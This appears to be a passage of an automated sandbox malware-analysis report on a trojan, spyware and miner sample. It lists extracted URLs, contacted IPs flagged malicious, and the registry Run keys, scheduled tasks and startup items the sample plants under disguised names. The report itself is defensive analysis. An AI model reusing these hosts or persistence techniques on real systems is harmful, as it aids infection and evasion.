                                                                                                                        http://schemas.xmlsoap.org/ws/2005/02/trust/Renew8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://tempuri.org/Entity/Id8Response8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          		unknown
                                                                                                                          https://support.google.com/chrome/?p=plugin_wmp8EC4.exe, 00000028.00000002.980111699.0000000002C16000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1047119383.0000000002E66000.00000004.00000001.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpfalse
                                                                                                                              		high
                                                                                                                              http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpfalse
                                                                                                                                		high
                                                                                                                                http://schemas.xmlsoap.org/ws/2006/02/addressingidentity8EC4.exe, 00000028.00000002.960931410.0000000002AF0000.00000004.00000001.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://support.google.com/chrome/?p=plugin_java8EC4.exe, 00000028.00000002.980111699.0000000002C16000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1047119383.0000000002E66000.00000004.00000001.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          http://schemas.xmlsoap.org/ws/2004/06/addressingex8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ15108EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://support.google.com/chrome/?p=plugin_divx8EC4.exe, 00000028.00000002.1047119383.0000000002E66000.00000004.00000001.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    http://tempuri.org/Entity/Id13Response8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmpfalse
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    		unknown
                                                                                                                                                    http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA18EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA18EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://www.google.com/images/branding/product/ico/googleg_lodp.ico8EC4.exe, 00000028.00000002.980111699.0000000002C16000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1005269358.0000000002CD8000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1002161334.0000000002CC2000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.976992957.0000000002C00000.00000004.00000001.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            http://schemas.xmlsoap.org/ws/2002/12/policy8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              http://tempuri.org/Entity/Id22Response8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmpfalse
                                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                                              		unknown
                                                                                                                                                                              https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search8EC4.exe, 00000028.00000002.980111699.0000000002C16000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1005269358.0000000002CD8000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1002161334.0000000002CC2000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.976992957.0000000002C00000.00000004.00000001.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                https://www.tiktok.com/legal/report/feedbacksvchost.exe, 0000001D.00000003.800561405.00000188AC37D000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.800577498.00000188AC38E000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.800720160.00000188AC3AF000.00000004.00000001.sdmpfalse
                                                                                                                                                                                • URL Reputation: safe
                                                                                                                                                                                		unknown
                                                                                                                                                                                http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    http://schemas.xmlsoap.org/ws/2005/02/trust/Issue8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      https://get.adob8EC4.exe, 00000028.00000002.980111699.0000000002C16000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1047119383.0000000002E66000.00000004.00000001.sdmpfalse
                                                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                                                      		unknown
                                                                                                                                                                                      http://schemas.xmlsoap.org/ws/2005/02/trust/spnego8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        http://schemas.xmlsoap.org/ws/2005/02/sc8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          http://tempuri.org/Entity/Id18Response8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmpfalse
                                                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                                                          		unknown
                                                                                                                                                                                          http://service.real.com/realplayer/security/02062012_player/en/8EC4.exe, 00000028.00000002.980111699.0000000002C16000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1047119383.0000000002E66000.00000004.00000001.sdmpfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              https://disneyplus.com/legal.svchost.exe, 0000001D.00000003.794726448.00000188AC382000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.794353664.00000188AC371000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.794332789.00000188AC360000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.795192720.00000188AC360000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.795091676.00000188AC3A3000.00000004.00000001.sdmpfalse
                                                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                                                              		unknown
                                                                                                                                                                                              http://tempuri.org/Entity/Id3Response8EC4.exe, 00000028.00000002.1019624757.0000000002D58000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmpfalse
                                                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                                                              		unknown
                                                                                                                                                                                              http://schemas.xmlsoap.org/ws/2005/02/rm8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmpfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmpfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  http://schemas.xmlsoap.org/soap/actor/next8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmpfalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=8EC4.exe, 00000028.00000002.980111699.0000000002C16000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1005269358.0000000002CD8000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1002161334.0000000002CC2000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.976992957.0000000002C00000.00000004.00000001.sdmpfalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      http://service.r8EC4.exe, 00000028.00000002.980111699.0000000002C16000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1047119383.0000000002E66000.00000004.00000001.sdmpfalse
                                                                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpfalse
                                                                                                                                                                                                        		high

                                                                                                                                                                                                        Contacted IPs

                                                                                                                                                                                                        • No. of IPs < 25%
                                                                                                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                                                                                                        • 75% < No. of IPs

                                                                                                                                                                                                        Public

                                                                                                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                        185.163.45.70
                                                                                                                                                                                                        		unknownMoldova Republic of
                                                                                                                                                                                                        		39798MIVOCLOUDMDfalse
                                                                                                                                                                                                        185.215.113.35
                                                                                                                                                                                                        		unknownPortugal
                                                                                                                                                                                                        		206894WHOLESALECONNECTIONSNLtrue
                                                                                                                                                                                                        188.166.28.199
                                                                                                                                                                                                        		unknownNetherlands
                                                                                                                                                                                                        		14061DIGITALOCEAN-ASNUStrue
                                                                                                                                                                                                        86.107.197.138
                                                                                                                                                                                                        		unknownRomania
                                                                                                                                                                                                        		39855MOD-EUNLfalse
                                                                                                                                                                                                        54.38.220.85
                                                                                                                                                                                                        		unicupload.topFrance
                                                                                                                                                                                                        		16276OVHFRfalse
                                                                                                                                                                                                        40.93.212.0
                                                                                                                                                                                                        		microsoft-com.mail.protection.outlook.comUnited States
                                                                                                                                                                                                        		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                        104.21.38.221
                                                                                                                                                                                                        		goo.suUnited States
                                                                                                                                                                                                        		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                        93.189.42.167
                                                                                                                                                                                                        		host-data-coin-11.comRussian Federation
                                                                                                                                                                                                        		41853NTCOM-ASRUfalse
                                                                                                                                                                                                        144.76.136.153
                                                                                                                                                                                                        		transfer.shGermany
                                                                                                                                                                                                        		24940HETZNER-ASDEfalse
                                                                                                                                                                                                        162.159.130.233
                                                                                                                                                                                                        		cdn.discordapp.comUnited States
                                                                                                                                                                                                        		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                        185.233.81.115
                                                                                                                                                                                                        		unknownRussian Federation
                                                                                                                                                                                                        		50113SUPERSERVERSDATACENTERRUtrue
                                                                                                                                                                                                        8.209.67.104
                                                                                                                                                                                                        		patmushta.infoSingapore
                                                                                                                                                                                                        		45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCfalse
                                                                                                                                                                                                        185.7.214.171
                                                                                                                                                                                                        		unknownFrance
                                                                                                                                                                                                        		42652DELUNETDEtrue
                                                                                                                                                                                                        185.186.142.166
                                                                                                                                                                                                        		unknownRussian Federation
                                                                                                                                                                                                        		204490ASKONTELRUtrue
                                                                                                                                                                                                        141.8.194.74
                                                                                                                                                                                                        		a0621298.xsph.ruRussian Federation
                                                                                                                                                                                                        		35278SPRINTHOSTRUfalse
                                                                                                                                                                                                        185.163.204.22
                                                                                                                                                                                                        		unknownGermany
                                                                                                                                                                                                        		20771CAUCASUS-CABLE-SYSTEMCCSAutonomousSystemGEfalse
                                                                                                                                                                                                        185.163.204.24
                                                                                                                                                                                                        		unknownGermany
                                                                                                                                                                                                        		20771CAUCASUS-CABLE-SYSTEMCCSAutonomousSystemGEtrue

                                                                                                                                                                                                        Private

                                                                                                                                                                                                        IP
                                                                                                                                                                                                        192.168.2.1

                                                                                                                                                                                                        General Information

                                                                                                                                                                                                        Joe Sandbox Version:34.0.0 Boulder Opal
                                                                                                                                                                                                        Analysis ID:552969
                                                                                                                                                                                                        Start date:14.01.2022
                                                                                                                                                                                                        Start time:00:13:36
                                                                                                                                                                                                        Joe Sandbox Product:CloudBasic
                                                                                                                                                                                                        Overall analysis duration:0h 16m 13s
                                                                                                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                                                                                                        Report type:light
                                                                                                                                                                                                        Sample file name:U3E7zMaux2.exe
                                                                                                                                                                                                        Cookbook file name:default.jbs
                                                                                                                                                                                                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                                                                        Number of analysed new started processes analysed:50
                                                                                                                                                                                                        Number of new started drivers analysed:0
                                                                                                                                                                                                        Number of existing processes analysed:0
                                                                                                                                                                                                        Number of existing drivers analysed:0
                                                                                                                                                                                                        Number of injected processes analysed:1
                                                                                                                                                                                                        Technologies:
                                                                                                                                                                                                        • HCA enabled
                                                                                                                                                                                                        • EGA enabled
                                                                                                                                                                                                        • HDC enabled
                                                                                                                                                                                                        • AMSI enabled
                                                                                                                                                                                                        Analysis Mode:default
                                                                                                                                                                                                        Analysis stop reason:Timeout
                                                                                                                                                                                                        Detection:MAL
                                                                                                                                                                                                        Classification:mal100.troj.spyw.evad.mine.winEXE@60/50@96/18
                                                                                                                                                                                                        EGA Information:
                                                                                                                                                                                                        • Successful, ratio: 92.3%
                                                                                                                                                                                                        HDC Information:
                                                                                                                                                                                                        • Successful, ratio: 47.6% (good quality ratio 37.6%)
                                                                                                                                                                                                        • Quality average: 64%
                                                                                                                                                                                                        • Quality standard deviation: 39%
                                                                                                                                                                                                        HCA Information:
                                                                                                                                                                                                        • Successful, ratio: 95%
                                                                                                                                                                                                        • Number of executed functions: 0
                                                                                                                                                                                                        • Number of non-executed functions: 0
                                                                                                                                                                                                        Cookbook Comments:
                                                                                                                                                                                                        • Adjust boot time
                                                                                                                                                                                                        • Enable AMSI
                                                                                                                                                                                                        • Found application associated with file extension: .exe
                                                                                                                                                                                                        Warnings:
                                                                                                                                                                                                        Show All
                                                                                                                                                                                                        • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                                                                                                                                                                                        • TCP Packets have been reduced to 100
                                                                                                                                                                                                        • Exclude process from analysis (whitelisted): taskhostw.exe, BackgroundTransferHost.exe, UpdateNotificationMgr.exe, backgroundTaskHost.exe, wuapihost.exe
                                                                                                                                                                                                        • Excluded IPs from analysis (whitelisted): 51.11.168.232, 23.203.70.208, 13.89.179.12, 40.91.112.76, 20.54.110.249, 104.215.148.63, 40.76.4.15, 40.112.72.205, 40.113.200.201, 13.77.161.179, 20.189.173.22
                                                                                                                                                                                                        • Excluded domains from analysis (whitelisted): bitbucket.org, bbuseruploads.s3.amazonaws.com, displaycatalog-rp-uswest.md.mp.microsoft.com.akadns.net, onedsblobprdwus17.westus.cloudapp.azure.com, onedsblobprdcus17.centralus.cloudapp.azure.com, wus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, arc.msn.com, e11290.dspg.akamaiedge.net, go.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, consumer-displaycatalogrp-aks2aks-uswest.md.mp.microsoft.com.akadns.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, yandex.ru, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ctldl.windowsupdate.com, iplogger.org, settings-win.data.microsoft.com, settingsfd-geo.trafficmanager.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, go.microsoft.com.edgekey.net, blobcollector.events.data.trafficmanager.net, microsoft.com, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                                                                                                                                                        • Execution Graph export aborted for target 8EC4.exe, PID 6240 because there are no executed function
                                                                                                                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                        • Report creation exceeded maximum time and may have missing behavior and disassembly information.
                                                                                                                                                                                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                        • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                                                                                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                        • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                                                                        • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                                                                                                        Simulations

                                                                                                                                                                                                        Behavior and APIs

                                                                                                                                                                                                        TimeTypeDescription
                                                                                                                                                                                                        00:15:09Task SchedulerRun new task: Firefox Default Browser Agent 8F76897F18632802 path: C:\Users\user\AppData\Roaming\uufaeea
                                                                                                                                                                                                        00:15:24API Interceptor1x Sleep call for process: 7CA1.exe modified
                                                                                                                                                                                                        00:15:32API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                                                                                                                                                        00:15:33API Interceptor8x Sleep call for process: svchost.exe modified
                                                                                                                                                                                                        00:16:06API Interceptor4x Sleep call for process: 7801.exe modified
                                                                                                                                                                                                        00:16:06API Interceptor414x Sleep call for process: mjlooy.exe modified
                                                                                                                                                                                                        00:16:08Task SchedulerRun new task: mjlooy.exe path: C:\Users\user\AppData\Local\Temp\82aa4a6c48\mjlooy.exe
                                                                                                                                                                                                        00:16:22AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Steam C:\Users\user\AppData\Roaming\NVIDIA\dllhost.exe
                                                                                                                                                                                                        00:16:34AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Driver C:\Users\user\AppData\Roaming\Sysfiles\setup_e1.exe
                                                                                                                                                                                                        00:16:45AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Steam C:\Users\user\AppData\Roaming\NVIDIA\dllhost.exe
                                                                                                                                                                                                        00:16:57AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Driver C:\Users\user\AppData\Roaming\Sysfiles\setup_e1.exe
                                                                                                                                                                                                        00:17:09AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\start ChromeUpdate.lnk

                                                                                                                                                                                                        Joe Sandbox View / Context

                                                                                                                                                                                                        IPs

                                                                                                                                                                                                        No context

                                                                                                                                                                                                        Domains

                                                                                                                                                                                                        No context

                                                                                                                                                                                                        ASN

                                                                                                                                                                                                        No context

                                                                                                                                                                                                        JA3 Fingerprints

                                                                                                                                                                                                        No context

                                                                                                                                                                                                        Dropped Files

                                                                                                                                                                                                        No context

                                                                                                                                                                                                        Created / dropped Files

                                                                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_D984.exe_bcd76db1fe5d7f46e1bf3aadcd0e64871c556_e6d2f5c0_1ad174c5\Report.wer
                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                        File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):65536
                                                                                                                                                                                                        Entropy (8bit):0.8140048802892536
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:z+FmDLAM1kOQoJ7R3V6tpXIQcQec6tycEfcw3m+HbHg/8BRTf3o8Fa9iVfOyWYmq:as3AMR8HQ0lbjIq/u7s9S274Itr
                                                                                                                                                                                                        MD5:A77187FFD082A4C6C4803FF0494824A7
                                                                                                                                                                                                        SHA1:35CF158AFC534025FE186F1FFAA6DC320623566D
                                                                                                                                                                                                        SHA-256:85DFD5A39411BA976F6A87B3D2915C9EECB867A37B34E4D13A0A267F8A1C74B8
                                                                                                                                                                                                        SHA-512:77B9FA28B7AF746B8DE7192F75C5EB76FBD493A3110CE4678A44CA748396B0C0552260B91BE7B3818C27F79EC56E5959CCC227BC0CC9525A73F7F5D6A7CE14EA
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                        Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.2.8.6.5.8.9.3.2.2.5.3.4.1.1.6.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.8.6.5.8.9.3.3.0.8.4.6.5.5.4.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.5.c.3.d.4.c.3.-.0.9.a.9.-.4.2.f.9.-.b.a.2.6.-.4.d.c.2.2.4.9.e.8.0.2.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.b.7.c.e.d.c.6.-.6.9.2.2.-.4.1.7.8.-.9.0.4.5.-.0.7.4.3.c.a.4.6.9.8.b.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.D.9.8.4...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.6.7.c.-.0.0.0.1.-.0.0.1.b.-.a.d.e.6.-.a.a.6.a.d.3.0.8.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.b.f.3.7.4.4.3.4.4.9.b.5.e.c.b.5.4.f.6.4.0.f.a.2.5.6.e.b.5.8.5.0.0.0.0.2.9.0.1.!.0.0.0.0.5.9.9.5.a.e.9.d.0.2.4.7.0.3.6.c.c.6.d.3.e.a.7.4.1.e.7.5.0.4.c.9.1.3.f.1.f.b.7.6.!.D.9.8.4...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.1././.1.1././.1.2.:.
                                                                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER1E45.tmp.csv
                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):59464
                                                                                                                                                                                                        Entropy (8bit):3.0415890459619677
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:1536:rHHZvP5xQZDcKdcZRqoPikqjL/15hokyLNh2DqwixlV:rHHZvP5xQZDcKdcZRqoPikqjL/15hZyT
                                                                                                                                                                                                        MD5:BBF079652672E4A164C9D1F6600E9E1B
                                                                                                                                                                                                        SHA1:CB38376B0999BD10686C79A7341B27D7F6BBDAE7
                                                                                                                                                                                                        SHA-256:D506F771465D8185C355E35DFF9D7A75D004D0558E6BBC175E0AAED4E8281EBA
                                                                                                                                                                                                        SHA-512:060E0BA93F1113209B6CF858D67D965B0016D3521E2BC27EBDF7E1DECCC653512C37E3DCEDBC87A9052FED1106FD38102BD338D5FE1BF6FA0C4F36310AE9209D
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                        Preview: I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                                                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER29CF.tmp.txt
                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):13340
